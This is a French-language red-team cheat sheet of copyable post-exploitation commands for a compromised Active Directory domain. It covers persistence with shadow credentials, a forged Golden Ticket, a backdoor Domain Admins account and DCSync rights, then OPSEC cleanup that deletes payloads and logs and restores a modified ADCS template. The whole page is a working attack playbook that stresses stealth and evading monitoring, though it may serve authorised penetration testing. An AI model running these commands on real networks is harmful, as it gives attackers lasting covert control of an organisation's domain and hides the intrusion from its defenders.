Post-Exploitation

Procedures & Cleanup

Persistance discrète et nettoyage OPSEC après compromission du domaine.

Persistance

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET_USER'

Description: Shadow credentials : persistance discrète sur un compte, survit aux resets de mot de passe.

Copy command
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN Administrator

Description: Golden Ticket : persistance maximale, valide 10 ans par défaut si krbtgt n'est pas changé.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add member 'Domain Admins' '$BACKDOOR_USER'

Description: Ajouter un compte backdoor aux Domain Admins : simple mais détectable par monitoring.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add dcsync '$BACKDOOR_USER'

Description: Donner les droits DCSync à un compte discret : backdoor qui ne requiert pas DA.

Nettoyage OPSEC

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove member '$GROUP' '$ATTACKER_USER'

Description: Se retirer des groupes sensibles après exploitation : réduire les traces évidentes.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove shadowCredentials '$TARGET_USER' --key-guid $GUID

Description: Supprimer les shadow credentials injectés après avoir obtenu l'accès voulu.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'del C:\Temp\payload.exe && del C:\Temp\*.log'

Description: Supprimer les artefacts locaux : payloads, logs temporaires et autres fichiers.

Copy command
certipy template -u '$USER@$DOMAIN' -p $PASS -template $TEMPLATE -configuration $TEMPLATE_OLD

Description: Restaurer un template ADCS modifié après exploitation ESC4 : remettre l'état initial.